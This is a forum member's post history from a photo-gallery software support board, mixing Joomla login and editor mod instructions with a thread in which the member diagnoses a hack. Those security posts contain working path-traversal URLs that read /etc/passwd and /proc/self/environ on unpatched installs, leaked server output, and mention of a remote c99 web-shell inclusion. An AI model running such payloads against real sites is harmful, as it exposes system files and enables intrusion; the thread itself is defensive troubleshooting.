Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - MadSci

Pages: [1] 2 3 4 5 6
1
Mods & Plugins (Requests & Discussions) / Re: Joomla-4images single login (solved kinda)
« on: March 31, 2008, 03:46:24 PM »
Ok I see the interest is low so let me make it interesting:

to the PHP gurus:

can we make a PHP based registration wizard which can take the username password email etc.. and insert this data into both databases ?
Like:

1. Show terms and conditions
2. Get the user data for Joomla and 4images
3. Click next
4. Insert the data into 4images
5. show OK msg. click nex
6 Insert data into Joomla ( same username same password same email etc..etc..)
7. Show Ok msg

then we use the above wrapper to combine both applications.

so any takers ?

ms

2
Mods & Plugins (Requests & Discussions) / Joomla-4images single login (solved kinda)
« on: March 28, 2008, 10:06:32 PM »
Ok the pro and con first:

1. pro - single login
2. con - the users still have to register 2 times: once for joomla and then for 4images with the same username and password.

how to do:

1) install Joomla
2) install this component : http://joomlacode.org/gf/project/wrapper_login/ (  you need wrapper loiggin 1.5)
3) in Joomla goto Components -> WLXT --> create user_categories (like 4img)
4) Components --> WLXT --> Site Categories (something like 4img)
5) Components --> WLXT --> Sites --> fill in the blanks
for URL: use http:www.your_domain_name.com/4images_directory/login.php
for Username: put this: user_name
for Password: put this: user_password
the last 2 are the names of the 4images login form fields so paste them as they are;
6) goto Menus --> main menu --> new and click on the Wrapper_login component
on the right side fill in the blanks the user groups and the site...

remember to make all the links for registered users only so on the main page the link will show after you log to Joomla. Clicking on the link will automatically submit your joomla username and password to 4Images database and the front page will be shown as wrapper. The templates can be edited to fit the Joomla outlook.

Now about the registration problem the same wrapper may be used to submit your Joomla username and password to the 4images registration page which could solve the issue with the dual registration with different user names.

well at least its a start. :mrgreen:

ms


3
Discussion & Troubleshooting / 2 quick questions (CMS and FLV video)
« on: January 28, 2008, 05:39:07 PM »
Hey peoplz,
1. did anyone manage to make single login between 4images and some CMS like joomla or such ? this is a 2 year followup/update. of this post:
http://www.4homepages.de/forum/index.php?topic=10812.0 (posted dec 2005)  8O

2. Can we upload flash video files flv and how can we have them played like YouTube.. :mrgreen:

ms

..or may be we can have one PHP script to hold whole site registrations and somehow to interface any CMS or Image database..like you can have CMS and 4images with no registration instead they will use a common add-on which will handle any site registrations..or..the user-password database will be totally separate from the CMS or 4images
does that make any sense ?

ms

4
Mods & Plugins (Requests & Discussions) / Piclens plugin
« on: November 22, 2007, 05:48:18 PM »
Hey all,
how difficult will be to implement ? any takers?

http://www.piclens.com/enable/

i think it looks cool..

thnx

5
Discussion & Troubleshooting / Re: [Secutity] Security hole testing...please read
« on: November 16, 2007, 09:22:32 PM »
Here is what I fugure out:

1. I have installed a second copy of 4images on my server and tested the links and it seems that has NO effect.
2. Tested again my old site and I still got the same effect.

I thought that a template vatiable for some reason is not checked well so I downloaded the index.php from the new install and the index.php from my original site
then I used a program called K3DIFF to compare both files line by line thinking that the hacker may have exploited the site by modyfing the code for the index page. To my surprise the code of the index.php file is 1.7... and there were substantial differences with the newly installed index.php. this one is remakable:

on my origina site:
Code: [Select]
if (isset($HTTP_GET_VARS['template']) || isset($HTTP_POST_VARS['template'])) {
  $template = (isset($HTTP_GET_VARS['template'])) ? stripslashes(trim($HTTP_GET_VARS['template'])) : stripslashes(trim($HTTP_POST_VARS['template']));
  if (!file_exists(TEMPLATE_PATH."/".$template.".".$site_template->template_extension)) {
    $template = "";
  }
  else {
    $main_template = $template;
  }
}
else {
  $template = "";
}


and this is the index.php of the newly installed copy:

Code: [Select]

if (isset($HTTP_GET_VARS['template']) || isset($HTTP_POST_VARS['template'])) {
  $template = (isset($HTTP_GET_VARS['template'])) ?get_basefile(stripslashes($HTTP_GET_VARS['template'])) : get_basefile(stripslashes($HTTP_POST_VARS['template']));
  if (!file_exists(TEMPLATE_PATH."/".$template.".".$site_template->template_extension)) {
    $template = "";
  }
  else {
    $main_template = $template;
  }
}
else {
  $template = "";
}


note the : get_basefile
so im going to go ahead and reinstall the  4images hope that will solve the issue

ms

6
Discussion & Troubleshooting / Re: [Secutity] Shoud i be conserned ?
« on: November 16, 2007, 07:40:53 PM »
Hey Guys,
could you please execute this links on your server and report  if anything unusual:

Code: [Select]
http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/passwd%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/group%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/hosts%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/services%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/syslog.conf%00

replace: yourdomain.com and the 4images_dir with your own domain name and directory



This links were security hole for my site which was disabled by the host until we figure this out. Unfortunately so far this is the first report of such activity so before we label it as hole we need to see if somebody else have the same problem. If not then I will reinstall and rebuild my site from scratch...

thanx I really appreciate the help

ms

7
Discussion & Troubleshooting / Re: [Secutity] Shoud i be conserned ?
« on: November 07, 2007, 10:14:26 PM »
What I did is:

1. installed seccond copy of 4images 1.7.4 on my server.
2. from the old 4images I copy the skin and the media folder
3. I logged in the new 4images and just restored the database and the skin..
no additional MODs installed...or anything...

for the past 2 months Ive seen increased attempts to run C99 shell scripts. The most hits are coming from veloxzone.com.br site..they always try :

index.php?template=site which has c99 shel or other trojan..
it never worked this is the only one which manage to run environ command which is unuasual..the hit came from south africa I guess proxy.

ms

8
Discussion & Troubleshooting / Re: [Secutity] Shoud i be conserned ?
« on: November 07, 2007, 07:22:38 PM »
did u get the same thing ?

whats the verdict guys..how serious is it ?

ms

9
Discussion & Troubleshooting / Re: [Secutity] Shoud i be conserned ?
« on: November 07, 2007, 02:44:58 AM »
realy I have 1.7.4 installed fresh no issues so far..and I dont see any C99 shell scripts or unusual files...here is what I get:

PATH=/usr/local/bin:/usr/bin:/bin�DOCUMENT_ROOT=/home/usr/public_html
�HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
�HTTP_ACCEPT_CHARSET=windows-1252,utf-8;q=0.7,*;q=0.7
�HTTP_ACCEPT_ENCODING=gzip,deflate
�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
�HTTP_CONNECTION=keep-alive
�HTTP_COOKIE=4images_lastvisit=1194399643; 4images_userid=-1; sessionid=bf0ab967af825fe368edf0d; PHPSESSID=73bde90b5fbe06062efec8
�HTTP_HOST=www.blahblah.com
�HTTP_KEEP_ALIVE=300
�HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
�REMOTE_ADDR=my ip�REMOTE_PORT=2258�SCRIPT_FILENAME=/home/usr/public_html/db/index.php
�SERVER_ADDR=67.15.�SERVER_ADMIN=webmaster@4images.com�SERVER_NAME=www.blah.com
�SERVER_PORT=80�SERVER_SOFTWARE=Apache�GATEWAY_INTERFACE=CGI/1.1�SERVER_PROTOCOL=HTTP/1.1�REQUEST_METHOD=GET
�QUERY_STRING=template=../../../../../../proc/self/environ%00�REQUEST_URI=/db/index.php?template=../../../../../../proc/self/environ%00�SCRIPT_NAME=/db/index.php

some info was changed to preserve security

10
Discussion & Troubleshooting / Re: [Secutity] Shoud i be conserned ?
« on: November 07, 2007, 01:56:24 AM »
try this

www.yourdomainname.com/4images/index.php?template=../../../../../../proc/self/environ%00

it will list some environ vars

ms


11
Discussion & Troubleshooting / Re: [Secutity] Shoud i be conserned ?
« on: November 07, 2007, 01:07:17 AM »
PHP Warning:  main() [<a href='function.include'>function.include</a>]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/lib/php/PEAR') in htp://speakerformula.com/forum/c99.txt? on line 1

c99 is shell crap

ms

ps do not click the link it has a virus

12
Discussion & Troubleshooting / [Secutity] Security hole testing...please read
« on: November 07, 2007, 12:04:59 AM »
This was executed remotely:

/index.php?template=../../../../../../proc/self/environ%00

it lists some info about the server hosting the database

ms

13
Mods & Plugins (Requests & Discussions) / [MOD] WYSIWYG editor for image description
« on: September 20, 2007, 04:08:32 PM »
Ok so finally I figure that one out:

DIFFICULTY LEVEL: easy
TIME TO COPLETE: about 5 min
FILE TO EDIT: member_uploadform.html in your templates directory
WYSIWYG EDITOR: WyzzEditor v0.62 -->http://www.wyzz.info

1. Download the WyzzEditor and extract on your disk. You will see 2 folders and one js script. Upload all 3 in your currant template folder.
2. Open the wyzz.js for editing.

Find the following regions:

Code: [Select]
// Edit region stylesheet
editstyle = 'wyzzstyles/editarea.css';

// Style Sheet
document.write('<link rel="stylesheet" type="text/css" href="wyzzstyles/style.css">\n');


toolbar += '<td style="width: 22px;"><img src="wyzzicons/' +buttonName[btn]+ '.gif" border=0 unselectable="on" title="' +buttonName[btn]+

toolbar2 += '<td style="width: 22px;"><img src="wyzzicons/' +buttonName2[btn]+ '.gif" border=0 unselectable="on" title="' +buttonName2[btn]+
and edit the HREF and SRC to have the full link to the styles and icons like:
Code: [Select]
editstyle = 'wyzzstyles/editarea.css';
editstyle = 'http://www.yoursite.com/4images/templates/your_template/wyzzstyles/editarea.css';

NOTE: edit only the HREF and SRC nothing else

3. Open the meber_uploadform.html and on top of:

Code: [Select]
<form method="post" action="{url_member}" enctype="multipart/form-data"
paste this:
Code: [Select]
<script language="JavaScript" type="text/javascript" src="http://www.yoursite.com/4images/templates/your_template/wyzz.js"></script>

and then goto:

Code: [Select]
<td class="cat1"> <textarea name="image_description" cols="30" class="textarea" rows="10" wrap="VIRTUAL">{image_description}</textarea>

edit to:

Code: [Select]
<td class="cat1"> <textarea name="image_description" id="textfield" cols="30" class="textarea" rows="10" wrap="VIRTUAL">{image_description}</textarea>

Note: the ID element was inserted

and then add right under the textarea:

Code: [Select]
<script language="javascript1.2">make_wyzz('textfield');</script>
      

save and test.

Hope you like it.

ms

Troubleshooting:
1. its not working: check your links


PS one more thing:

examine the config guidelines in wyzz.js so you can customize your editor. You can add or remove butons, set the W and H of the editor as well as show and hide bars.

ms

14
Discussion & Troubleshooting / Re: WYSWYG news editor..
« on: September 19, 2007, 09:20:47 PM »
Hey thunders.. :)
acually Im not using any 4images type of codding at all.. the phpfile I was reffuring to is actually a html file with iframe..I just renamed it so it will show up as a plug it..

bye the way it shows as NewsEditor.php not just NewsEditor how do you get rid of the php in the name..? not that it matters..

15
Discussion & Troubleshooting / WYSWYG news editor..
« on: September 19, 2007, 08:44:01 PM »
Ok, up to now I was including additional pages in my 4images using Iframes..however recently I found that script which I pasted in the header.html..
http://www.dynamicdrive.com/dynamicindex17/ajaxincludes.htm

so now to include a html page anyware you just use:
Code: [Select]
<script type="text/javascript">
ajaxinclude("afile.htm")
</script>

with this working like a charm I found this little script:
http://newswriter2005.sourceforge.net/

as well as this litle script:
http://www.wyzz.info/

I have merged the newswriter and the wyzz scritp to have WYSWYG editor.

I have modifyed the index.php page of the newswriter by deleting : admin login option and change few tables and collor to match my site.

The resulting index.php was included usign the ajaxinclude opiton into my front page..thus I now have WYSWYG news on the front page.
I made one html file with I frame to call the admin.php for the news writer..then I renamed the html to php and put it in the plugins directory of the 4images.. now I can edit my front news with WYSWYG editor from whitin the 4images.

This is like very ammateurish but hey it works..
hope someone can improve it..

ms


Pages: [1] 2 3 4 5 6